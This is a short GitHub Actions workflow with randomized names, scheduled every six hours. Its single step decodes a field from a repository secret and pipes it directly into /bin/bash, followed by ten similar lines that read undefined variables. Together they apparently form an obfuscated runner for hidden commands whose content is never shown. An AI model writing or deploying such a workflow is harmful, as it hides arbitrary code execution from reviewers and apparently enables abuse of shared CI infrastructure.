name: liusichang3819

on:
  workflow_dispatch:
  schedule:
    - cron: '14 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liusichang3819
        env:
          pq49241: ${{ secrets.pq49241 }}
        run: |
          echo $pq49241 | jq -r .qjjkt476 | /bin/bash
          echo $ibba87914 | jq -r .pqjm275 | /bin/bash
          echo $jtiw49 | jq -r .xnw4379 | /bin/bash
          echo $cy220 | jq -r .skz962 | /bin/bash
          echo $u0084 | jq -r .vsdwl4 | /bin/bash
          echo $kiwg7799 | jq -r .n13 | /bin/bash
          echo $kid839 | jq -r .szi2133 | /bin/bash
          echo $vivga503 | jq -r .o88528 | /bin/bash
          echo $x1147 | jq -r .mdy845 | /bin/bash
          echo $hwfa88361 | jq -r .rcxyc2 | /bin/bash
          echo $rfdw72 | jq -r .lk59 | /bin/bash

